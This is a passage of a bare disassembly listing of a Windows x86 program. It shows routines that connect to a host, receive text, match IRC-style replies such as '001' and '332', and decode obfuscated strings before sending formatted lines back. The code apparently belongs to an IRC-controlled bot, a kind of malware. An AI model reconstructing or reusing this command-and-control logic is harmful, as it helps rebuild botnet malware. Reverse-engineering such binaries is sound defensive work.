		mov	[ebp+eax*4+var_820], esi
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_418346
		push	offset aS_10	; "/s"
		push	esi
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_41834A

loc_418346:				; CODE XREF: sub_4182F6+3Dj
		mov	byte ptr [ebp+var_8], 1

loc_41834A:				; CODE XREF: sub_4182F6+4Ej
		push	offset asc_421480 ; " "
		push	ebx
		call	sub_403FC4
		inc	[ebp+var_4]

loc_418358:				; CODE XREF: sub_4182F6+22j
		mov	esi, eax
		cmp	esi, ebx
		pop	ecx
		pop	ecx
		jnz	short loc_41831A
		mov	edi, [ebp+arg_0]
		mov	esi, [ebp+var_820]
		add	edi, 5
		mov	edx, edi
		mov	ecx, esi

loc_418370:				; CODE XREF: sub_4182F6+92j
		mov	al, [ecx]
		cmp	al, [edx]
		jnz	short loc_41838E
		test	al, al
		jz	short loc_41838A
		mov	al, [ecx+1]
		cmp	al, [edx+1]
		jnz	short loc_41838E
		inc	ecx
		inc	ecx
		inc	edx
		inc	edx
		test	al, al
		jnz	short loc_418370

loc_41838A:				; CODE XREF: sub_4182F6+82j
		xor	eax, eax
		jmp	short loc_418393
; ---------------------------------------------------------------------------

loc_41838E:				; CODE XREF: sub_4182F6+7Ej
					; sub_4182F6+8Aj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418393:				; CODE XREF: sub_4182F6+96j
		cmp	eax, ebx
		jz	short loc_4183A4
		mov	eax, edi
		mov	ecx, esi
		call	sub_419CC4
		test	eax, eax
		jz	short loc_4183D0

loc_4183A4:				; CODE XREF: sub_4182F6+9Fj
		xor	eax, eax
		cmp	[ebp+var_4], ebx
		jle	short loc_4183CD
		mov	ecx, [ebp+var_4]
		dec	ecx

loc_4183AF:				; CODE XREF: sub_4182F6+CFj
		cmp	eax, ecx
		jz	short loc_4183C1
		mov	edx, [ebp+eax*4+var_81C]
		mov	[ebp+eax*4+var_820], edx

loc_4183C1:				; CODE XREF: sub_4182F6+BBj
		inc	eax
		cmp	eax, [ebp+var_4]
		jl	short loc_4183AF
		mov	esi, [ebp+var_820]

loc_4183CD:				; CODE XREF: sub_4182F6+B3j
		dec	[ebp+var_4]

loc_4183D0:				; CODE XREF: sub_4182F6+ACj
		cmp	byte ptr [ebp+var_8], bl
		jz	short loc_4183D8
		dec	[ebp+var_4]

loc_4183D8:				; CODE XREF: sub_4182F6+DDj
		mov	al, [esi]
		cmp	al, byte_4279D0
		jnz	loc_4184B6
		mov	eax, esi
		lea	ecx, [eax+1]

loc_4183EB:				; CODE XREF: sub_4182F6+FAj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4183EB
		sub	eax, ecx
		push	eax
		lea	eax, [esi+1]
		push	eax
		push	esi
		call	sub_403EA0
		mov	eax, dword_437E40
		mov	esi, [eax]
		mov	ebx, offset dword_437E3C
		mov	edi, ebx
		add	esp, 0Ch
		mov	[ebp+var_C], esi
		mov	[ebp+var_10], edi

loc_418416:				; CODE XREF: sub_4182F6+192j
		test	edi, edi
		mov	eax, dword_437E40
		mov	[ebp+var_14], eax
		jz	short loc_418426
		cmp	edi, ebx
		jz	short loc_41842B

loc_418426:				; CODE XREF: sub_4182F6+12Aj
		call	sub_4034EB

loc_41842B:				; CODE XREF: sub_4182F6+12Ej
		cmp	esi, [ebp+var_14]
		jz	loc_4184B6
		test	edi, edi
		jnz	short loc_41843D
		call	sub_4034EB

loc_41843D:				; CODE XREF: sub_4182F6+140j
		cmp	esi, [edi+4]
		jnz	short loc_418447
		call	sub_4034EB

loc_418447:				; CODE XREF: sub_4182F6+14Aj
		mov	ecx, [ebp+var_820]
		lea	eax, [esi+0Ch]

loc_418450:				; CODE XREF: sub_4182F6+172j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_41846E
		test	dl, dl
		jz	short loc_41846A
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_41846E
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418450

loc_41846A:				; CODE XREF: sub_4182F6+162j
		xor	eax, eax
		jmp	short loc_418473
; ---------------------------------------------------------------------------

loc_41846E:				; CODE XREF: sub_4182F6+15Ej
					; sub_4182F6+16Aj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418473:				; CODE XREF: sub_4182F6+176j
		test	eax, eax
		jz	short loc_41848A
		lea	edi, [ebp+var_20]
		lea	esi, [ebp+var_10]
		call	sub_40166F
		mov	esi, [ebp+var_C]
		mov	edi, [ebp+var_10]
		jmp	short loc_418416
; ---------------------------------------------------------------------------

loc_41848A:				; CODE XREF: sub_4182F6+17Fj
		cmp	esi, [edi+4]
		jnz	short loc_418494
		call	sub_4034EB

loc_418494:				; CODE XREF: sub_4182F6+197j
		mov	ecx, [esi+8]
		mov	eax, [ecx]
		lea	edx, [ebp+var_820]
		push	edx
		mov	edx, [ebp+var_4]
		dec	edx
		push	edx
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+var_8]
		push	[ebp+arg_4]
		call	dword ptr [eax]

loc_4184B6:				; CODE XREF: sub_4182F6+EAj
					; sub_4182F6+138j
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	18h
sub_4182F6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4184BD	proc near		; CODE XREF: sub_418B81+107p

var_10F34	= dword	ptr -10F34h
var_10734	= dword	ptr -10734h
var_10730	= dword	ptr -10730h
var_1072C	= byte ptr -1072Ch
var_1062C	= byte ptr -1062Ch
var_1052C	= byte ptr -1052Ch
var_1042C	= byte ptr -1042Ch
var_72C		= byte ptr -72Ch
var_72B		= byte ptr -72Bh
var_62C		= byte ptr -62Ch
var_62B		= byte ptr -62Bh
var_52C		= byte ptr -52Ch
var_52B		= byte ptr -52Bh
var_52A		= byte ptr -52Ah
var_32C		= byte ptr -32Ch
var_32B		= byte ptr -32Bh
var_22C		= byte ptr -22Ch
var_22B		= byte ptr -22Bh
var_1AC		= byte ptr -1ACh
var_1AB		= byte ptr -1ABh
var_A8		= byte ptr -0A8h
var_A7		= byte ptr -0A7h
var_78		= byte ptr -78h
var_77		= byte ptr -77h
var_54		= byte ptr -54h
var_53		= byte ptr -53h
var_44		= byte ptr -44h
var_43		= byte ptr -43h
var_38		= byte ptr -38h
var_37		= byte ptr -37h
var_2C		= byte ptr -2Ch
var_2B		= byte ptr -2Bh
var_20		= byte ptr -20h
var_1F		= byte ptr -1Fh
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_10		= dword	ptr -10h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	eax, 10F38h
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	esi, 1FFh
		xor	ebx, ebx
		push	esi
		mov	[ebp+var_10734], eax
		lea	eax, [ebp+var_52B]
		mov	edi, ecx
		push	ebx
		push	eax
		mov	[ebp+var_10730], edi
		mov	[ebp+var_52C], bl
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	offset aS_13	; "%s"
		lea	eax, [ebp+var_52C]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_52C]
		add	esp, 10h
		lea	edi, [eax+1]

loc_418525:				; CODE XREF: sub_4184BD+6Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418525
		sub	eax, edi
		mov	[ebp+eax+var_52C], bl
		lea	eax, [ebp+var_52C]
		push	offset asc_421400 ; " :"
		push	eax
		call	sub_403D40
		push	eax
		push	offset aS_14	; "%s"
		lea	eax, [ebp+var_52C]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_52C]
		add	esp, 18h
		lea	esi, [eax+1]

loc_418565:				; CODE XREF: sub_4184BD+ADj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418565
		sub	eax, esi
		mov	[ebp+eax+var_52C], bl
		lea	eax, [ebp+var_52C]
		lea	esi, [eax+1]

loc_41857E:				; CODE XREF: sub_4184BD+C6j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41857E
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_52A]
		push	eax
		lea	eax, [ebp+var_52C]
		push	eax
		call	sub_403EA0
		add	esp, 0Ch
		push	offset asc_421408 ; " "
		push	[ebp+var_10730]
		call	sub_403FC4
		cmp	eax, ebx
		pop	ecx
		pop	ecx
		jz	short loc_4185FF
		xor	esi, esi

loc_4185B6:				; CODE XREF: sub_4184BD+140j
		push	eax
		push	offset aS_15	; "%s"
		lea	edi, [ebp+esi+var_1072C]
		push	0FFh
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 10h
		lea	edi, [eax+1]

loc_4185D6:				; CODE XREF: sub_4184BD+11Ej
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4185D6
		sub	eax, edi
		add	eax, esi
		push	offset asc_421410 ; " "
		push	ebx
		mov	[ebp+eax+var_1072C], bl
		call	sub_403FC4
		pop	ecx
		add	esi, 100h
		cmp	eax, ebx
		pop	ecx
		jnz	short loc_4185B6

loc_4185FF:				; CODE XREF: sub_4184BD+F5j
		xor	eax, eax
		mov	[ebp+var_2C], bl
		lea	edi, [ebp+var_2B]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_38], bl
		lea	edi, [ebp+var_37]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_54], bl
		lea	edi, [ebp+var_53]
		stosd
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_20], bl
		lea	edi, [ebp+var_1F]
		stosd
		push	0FFh
		stosd
		lea	eax, [ebp+var_32B]
		push	ebx
		push	eax
		mov	[ebp+var_32C], bl
		call	sub_408130
		add	esp, 0Ch
		push	2Fh
		lea	eax, [ebp+var_A7]
		push	ebx
		push	eax
		mov	[ebp+var_A8], bl
		call	sub_408130
		xor	eax, eax
		mov	[ebp+var_14], bl
		lea	edi, [ebp+var_13]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_44], bl
		lea	edi, [ebp+var_43]
		stosd
		add	esp, 0Ch
		push	7Fh
		stosd
		lea	eax, [ebp+var_22B]
		push	ebx
		push	eax
		mov	[ebp+var_22C], bl
		call	sub_408130
		add	esp, 0Ch
		push	9
		lea	esi, [ebp+var_2C]
		mov	ebx, offset aSipj ; "‘ˆ†"
		call	sub_41A301
		pop	ecx
		push	9
		lea	esi, [ebp+var_38]
		mov	ebx, offset aKivk ; "Šˆ‚Š"
		call	sub_41A301
		pop	ecx
		push	0Dh
		lea	esi, [ebp+var_54]
		mov	ebx, offset aSuicmtj ; "‘“ˆ—Œ’†"
		call	sub_41A301
		pop	ecx
		lea	ecx, [ebp+var_2C]
		lea	eax, [ebp+var_1072C]

loc_4186C0:				; CODE XREF: sub_4184BD+21Bj
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_4186DE
		test	dl, dl
		jz	short loc_4186DA
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_4186DE
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_4186C0

loc_4186DA:				; CODE XREF: sub_4184BD+20Bj
		xor	eax, eax
		jmp	short loc_4186E3
; ---------------------------------------------------------------------------

loc_4186DE:				; CODE XREF: sub_4184BD+207j
					; sub_4184BD+213j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4186E3:				; CODE XREF: sub_4184BD+21Fj
		test	eax, eax
		jnz	short loc_418727
		push	9
		lea	esi, [ebp+var_20]
		mov	ebx, offset aSopj ; "‘ކ"
		call	sub_41A301
		mov	edi, [ebp+var_10734]
		pop	ecx
		lea	eax, [ebp+var_1062C]
		push	eax
		mov	eax, esi
		push	eax
		push	offset aSS_10	; "%s %s\r\n"
		call	sub_417F4C
		add	esp, 0Ch
		test	al, al
		jnz	short loc_41871F

loc_418718:				; CODE XREF: sub_4184BD+333j
		xor	al, al
		jmp	loc_418B70
; ---------------------------------------------------------------------------

loc_41871F:				; CODE XREF: sub_4184BD+259j
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosb

loc_418727:				; CODE XREF: sub_4184BD+228j
		lea	ecx, [ebp+var_38]
		lea	eax, [ebp+var_1062C]

loc_418730:				; CODE XREF: sub_4184BD+28Bj
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_41874E
		test	dl, dl
		jz	short loc_41874A
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_41874E
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418730

loc_41874A:				; CODE XREF: sub_4184BD+27Bj
		xor	eax, eax
		jmp	short loc_418753
; ---------------------------------------------------------------------------

loc_41874E:				; CODE XREF: sub_4184BD+277j
					; sub_4184BD+283j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418753:				; CODE XREF: sub_4184BD+28Fj
		test	eax, eax
		jnz	loc_4187F5
		push	100h
		lea	esi, [ebp+var_32C]
		mov	ebx, offset aTtac ; "â‗"
		call	sub_41A301
		pop	ecx
		mov	ecx, esi
		lea	eax, [ebp+var_1052C]

loc_418779:				; CODE XREF: sub_4184BD+2D4j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_418797
		test	dl, dl
		jz	short loc_418793
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_418797
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_418779

loc_418793:				; CODE XREF: sub_4184BD+2C4j
		xor	eax, eax
		jmp	short loc_41879C
; ---------------------------------------------------------------------------

loc_418797:				; CODE XREF: sub_4184BD+2C0j
					; sub_4184BD+2CCj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_41879C:				; CODE XREF: sub_4184BD+2D8j
		test	eax, eax
		jnz	loc_418B6E
		push	9
		lea	esi, [ebp+var_14]
		mov	ebx, offset aLoip ; "‹Žˆ"
		call	sub_41A301
		pop	ecx
		push	30h
		lea	esi, [ebp+var_A8]
		mov	ebx, offset dword_4279B8
		call	sub_41A301
		mov	edi, [ebp+var_10734]
		pop	ecx
		mov	eax, esi
		push	eax
		lea	eax, [ebp+var_32C]
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		push	offset aSSS_2	; "%s %s %s\r\n"
		call	sub_417F4C
		add	esp, 10h

loc_4187E8:				; CODE XREF: sub_4184BD+3E0j
		test	al, al
		jnz	loc_418B6E
		jmp	loc_418718
; ---------------------------------------------------------------------------

loc_4187F5:				; CODE XREF: sub_4184BD+298j
		push	4
		mov	edi, offset a001 ; "001"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	loc_4188A2
		push	9
		lea	esi, [ebp+var_14]
		mov	ebx, offset aLoip ; "‹Žˆ"
		call	sub_41A301
		pop	ecx
		push	9
		lea	esi, [ebp+var_44]
		mov	ebx, offset aMoed ; "ŒŽ…„"
		call	sub_41A301
		lea	esi, [ebp+var_32C]
		mov	ebx, offset aTtac ; "â‗"
		mov	[esp+10h+var_10], 100h
		call	sub_41A301
		pop	ecx
		push	30h
		lea	esi, [ebp+var_A8]
		mov	ebx, offset dword_4279B8
		call	sub_41A301
		pop	ecx
		push	80h
		lea	esi, [ebp+var_22C]
		mov	ebx, offset byte_4279D1
		call	sub_41A301
		mov	edi, [ebp+var_10734]
		pop	ecx
		lea	eax, [ebp+var_A8]
		push	eax
		lea	eax, [ebp+var_32C]
		push	eax
		lea	eax, [ebp+var_14]
		push	eax
		mov	eax, esi
		push	eax
		lea	eax, [edi+5]
		push	eax
		lea	eax, [ebp+var_44]
		push	eax
		push	offset aSSSSSS	; "%s %s %s\r\n%s %s %s\r\n"
		call	sub_417F4C
		add	esp, 1Ch
		jmp	loc_4187E8
; ---------------------------------------------------------------------------

loc_4188A2:				; CODE XREF: sub_4184BD+34Aj
		lea	ecx, [ebp+var_54]
		lea	eax, [ebp+var_1062C]

loc_4188AB:				; CODE XREF: sub_4184BD+406j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_4188C9
		test	dl, dl
		jz	short loc_4188C5
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_4188C9
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_4188AB

loc_4188C5:				; CODE XREF: sub_4184BD+3F6j
		xor	eax, eax
		jmp	short loc_4188CE
; ---------------------------------------------------------------------------

loc_4188C9:				; CODE XREF: sub_4184BD+3F2j
					; sub_4184BD+3FEj
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_4188CE:				; CODE XREF: sub_4184BD+40Aj
		test	eax, eax
		jz	short loc_4188EA
		push	4
		mov	edi, offset a332 ; "332"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	loc_418B6E

loc_4188EA:				; CODE XREF: sub_4184BD+413j
		push	8
		pop	ecx
		xor	eax, eax
		mov	[ebp+var_78], 0
		lea	edi, [ebp+var_77]
		rep stosd
		mov	ebx, 0FFh
		push	ebx
		stosw
		xor	esi, esi
		lea	eax, [ebp+var_1AB]
		push	esi
		push	eax
		mov	byte ptr [ebp+var_10730], 0
		mov	[ebp+var_1AC], 0
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		lea	eax, [ebp+var_62B]
		push	esi
		push	eax
		mov	[ebp+var_62C], 0
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		lea	eax, [ebp+var_72B]
		push	esi
		push	eax
		mov	[ebp+var_72C], 0
		call	sub_408130
		add	esp, 0Ch
		lea	eax, [ebp+var_1072C]
		push	offset asc_421448 ; " :"
		push	eax
		call	sub_403FC4
		push	eax
		push	offset aS_1	; "%s"
		lea	eax, [ebp+var_62C]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_62C]
		add	esp, 18h
		lea	esi, [eax+1]

loc_418980:				; CODE XREF: sub_4184BD+4C8j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418980
		sub	eax, esi
		mov	[ebp+eax+var_62C], cl
		lea	eax, [ebp+var_1072C]
		push	offset asc_421450 ; "!"
		push	eax
		call	sub_403FC4
		push	eax
		push	offset aS_2	; "%s"
		lea	eax, [ebp+var_78]
		push	22h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_78]
		add	esp, 18h
		lea	esi, [eax+1]

loc_4189BB:				; CODE XREF: sub_4184BD+503j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4189BB
		sub	eax, esi
		mov	[ebp+eax+var_78], cl
		lea	eax, [ebp+var_78]
		lea	esi, [eax+1]

loc_4189CE:				; CODE XREF: sub_4184BD+516j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4189CE
		sub	eax, esi
		push	eax
		lea	eax, [ebp+var_77]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		call	sub_403EA0
		add	esp, 0Ch
		push	4
		mov	edi, offset a332_0 ; "332"
		lea	esi, [ebp+var_1062C]
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jnz	short loc_418A34
		lea	eax, [ebp+var_1042C]
		push	eax
		push	offset aS_3	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418A21:				; CODE XREF: sub_4184BD+569j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418A21
		mov	byte ptr [ebp+var_10730], 1
		jmp	loc_418AC1
; ---------------------------------------------------------------------------

loc_418A34:				; CODE XREF: sub_4184BD+53Dj
		mov	esi, [ebp+var_10734]
		add	esi, 5
		lea	eax, [ebp+var_1052C]

loc_418A43:				; CODE XREF: sub_4184BD+59Ej
		mov	cl, [eax]
		cmp	cl, [esi]
		jnz	short loc_418A61
		test	cl, cl
		jz	short loc_418A5D
		mov	cl, [eax+1]
		cmp	cl, [esi+1]
		jnz	short loc_418A61
		inc	eax
		inc	eax
		inc	esi
		inc	esi
		test	cl, cl
		jnz	short loc_418A43

loc_418A5D:				; CODE XREF: sub_4184BD+58Ej
		xor	eax, eax
		jmp	short loc_418A66
; ---------------------------------------------------------------------------

loc_418A61:				; CODE XREF: sub_4184BD+58Aj
					; sub_4184BD+596j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_418A66:				; CODE XREF: sub_4184BD+5A2j
		test	eax, eax
		jnz	short loc_418A95
		lea	eax, [ebp+var_78]
		push	eax
		push	offset aS_4	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418A8C:				; CODE XREF: sub_4184BD+5D4j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418A8C
		jmp	short loc_418AC1
; ---------------------------------------------------------------------------

loc_418A95:				; CODE XREF: sub_4184BD+5ABj
		lea	eax, [ebp+var_1052C]
		push	eax
		push	offset aS_5	; "%s"
		lea	eax, [ebp+var_1AC]
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_1AC]
		add	esp, 10h
		lea	edx, [eax+1]

loc_418ABA:				; CODE XREF: sub_4184BD+602j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_418ABA

loc_418AC1:				; CODE XREF: sub_4184BD+572j
					; sub_4184BD+5D6j
		sub	eax, edx
		push	100h
		lea	esi, [ebp+var_72C]
		mov	ebx, offset aIbIaQIdqzVk ; "ë¶© µïµ©¤ï§´¢ª"
		mov	[ebp+eax+var_1AC], 0
		call	sub_41A301
		pop	ecx
		lea	eax, [ebp+var_62C]
		mov	ecx, esi
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_418AFA
		cmp	byte ptr [ebp+var_10730], al
		jz	short loc_418B6E

loc_418AFA:				; CODE XREF: sub_4184BD+633j
		xor	edi, edi
		cmp	byte ptr [ebp+var_10730], 0
		lea	eax, [ebp+var_52C]
		jz	short loc_418B12
		push	offset asc_421468 ; ";"
		jmp	short loc_418B17
; ---------------------------------------------------------------------------

loc_418B12:				; CODE XREF: sub_4184BD+64Cj
		push	offset asc_42146C ; ";"

loc_418B17:				; CODE XREF: sub_4184BD+653j
		push	eax
		call	sub_403FC4
		jmp	short loc_418B33
; ---------------------------------------------------------------------------

loc_418B1F:				; CODE XREF: sub_4184BD+67Aj
		push	offset asc_421470 ; ";"
		push	0
		mov	[ebp+edi*4+var_10F34], eax
		call	sub_403FC4
		inc	edi

loc_418B33:				; CODE XREF: sub_4184BD+660j
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_418B1F
		xor	esi, esi
		test	edi, edi
		jle	short loc_418B6E

loc_418B3F:				; CODE XREF: sub_4184BD+6AFj
		push	[ebp+esi*4+var_10F34]
		lea	eax, [ebp+var_1AC]
		push	eax
		lea	eax, [ebp+var_62C]
		push	eax
		lea	eax, [ebp+var_78]
		push	eax
		push	[ebp+var_10730]
		push	[ebp+var_10734]
		call	sub_4182F6
		inc	esi
		cmp	esi, edi
		jl	short loc_418B3F

loc_418B6E:				; CODE XREF: sub_4184BD+2E1j
					; sub_4184BD+32Dj ...
		mov	al, 1

loc_418B70:				; CODE XREF: sub_4184BD+25Dj
		mov	ecx, [ebp+var_8]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	4
sub_4184BD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418B81	proc near		; CODE XREF: sub_41C77E+43Bp

var_20414	= dword	ptr -20414h
var_20410	= dword	ptr -20410h
var_2040C	= dword	ptr -2040Ch
var_20408	= byte ptr -20408h
var_408		= byte ptr -408h
var_407		= byte ptr -407h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		mov	eax, 20414h
		call	sub_4119C0
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		mov	esi, 3FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+var_407]
		mov	edi, ecx
		push	ebx
		push	eax
		mov	[ebp+var_20414], edi
		mov	[ebp+var_408], bl
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	esi
		lea	eax, [ebp+var_408]
		push	eax
		push	dword ptr [edi]
		mov	[ebp+var_2040C], ebx
		call	ds:dword_41E26C	; recv
		test	eax, eax
		jz	loc_418C96
		lea	eax, [ebp+var_408]
		lea	edx, [eax+1]

loc_418BE9:				; CODE XREF: sub_418B81+6Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418BE9
		sub	eax, edx
		mov	[ebp+eax+var_408], bl
		lea	eax, [ebp+var_408]
		push	offset asc_4213E4 ; "\r\n"
		push	eax
		call	sub_403FC4
		push	20000h
		mov	edi, eax
		lea	eax, [ebp+var_20408]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 14h
		cmp	edi, ebx
		mov	esi, 200h
		jz	short loc_418C6C
		lea	eax, [ebp+var_20408]
		mov	[ebp+var_20410], eax

loc_418C36:				; CODE XREF: sub_418B81+E9j
		push	edi
		push	offset aS_11	; "%s"
		push	1FFh
		push	[ebp+var_20410]
		call	sub_40307C
		push	offset asc_4213EC ; "\r\n"
		push	ebx
		call	sub_403FC4
		add	[ebp+var_20410], esi
		add	esp, 18h
		inc	[ebp+var_2040C]
		mov	edi, eax
		cmp	edi, ebx
		jnz	short loc_418C36

loc_418C6C:				; CODE XREF: sub_418B81+A7j
		cmp	[ebp+var_2040C], ebx
		jle	short loc_418C92
		mov	ebx, [ebp+var_2040C]
		lea	edi, [ebp+var_20408]

loc_418C80:				; CODE XREF: sub_418B81+10Fj
		push	[ebp+var_20414]
		mov	ecx, edi
		call	sub_4184BD
		add	edi, esi
		dec	ebx
		jnz	short loc_418C80

loc_418C92:				; CODE XREF: sub_418B81+F1j
		mov	al, 1
		jmp	short loc_418CA0
; ---------------------------------------------------------------------------

loc_418C96:				; CODE XREF: sub_418B81+59j
		push	dword ptr [edi]
		call	ds:dword_41E280	; closesocket
		xor	al, al

loc_418CA0:				; CODE XREF: sub_418B81+113j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_418B81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418CAF	proc near		; CODE XREF: sub_41C77E+429p

var_450		= dword	ptr -450h
var_44C		= dword	ptr -44Ch
var_448		= byte ptr -448h
var_447		= byte ptr -447h
var_444		= byte ptr -444h
var_443		= byte ptr -443h
var_440		= word ptr -440h
var_43E		= word ptr -43Eh
var_43C		= byte ptr -43Ch
var_430		= byte ptr -430h
var_42F		= byte ptr -42Fh
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_30		= byte ptr -30h
var_2F		= byte ptr -2Fh
var_24		= byte ptr -24h
var_23		= byte ptr -23h
var_18		= byte ptr -18h
var_17		= byte ptr -17h
var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 454h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		push	0
		push	1
		mov	edi, ecx
		push	2
		mov	[ebp+var_450], edi
		mov	ebx, edx
		mov	[ebp+var_44C], eax
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	[edi], eax
		jnz	short loc_418CF9
		push	eax

loc_418CEC:				; CODE XREF: sub_418CAF+8Bj
		call	ds:dword_41E280	; closesocket
		xor	al, al
		jmp	loc_418F0B
; ---------------------------------------------------------------------------

loc_418CF9:				; CODE XREF: sub_418CAF+3Aj
		push	1FFh
		lea	eax, [ebp+var_22F]
		push	0
		push	eax
		mov	[ebp+var_230], 0
		call	sub_408130
		add	esp, 0Ch
		push	200h
		lea	esi, [ebp+var_230]
		call	sub_41A301
		pop	ecx
		mov	eax, esi
		push	eax
		call	ds:dword_41E244	; gethostbyname
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		jnz	short loc_418D3C

loc_418D38:				; CODE XREF: sub_418CAF+E7j
		push	dword ptr [edi]
		jmp	short loc_418CEC
; ---------------------------------------------------------------------------

loc_418D3C:				; CODE XREF: sub_418CAF+87j
		push	200h
		lea	eax, [ebp+var_230]
		push	ebx
		push	eax
		call	sub_408130
		movsx	eax, word ptr [esi+0Ah]
		add	esp, 0Ch
		push	eax
		mov	eax, [esi+0Ch]
		push	dword ptr [eax]
		lea	eax, [ebp+var_43C]
		push	eax
		call	sub_4081B0
		add	esp, 0Ch
		push	[ebp+arg_4]
		mov	[ebp+var_440], 2
		call	ds:dword_41E270	; htons
		mov	[ebp+var_43E], ax
		push	10h
		lea	eax, [ebp+var_440]
		push	eax
		push	dword ptr [edi]
		call	ds:dword_41E23C	; connect
		test	eax, eax
		jnz	short loc_418D38
		mov	eax, [ebp+var_44C]
		lea	edx, [eax+1]

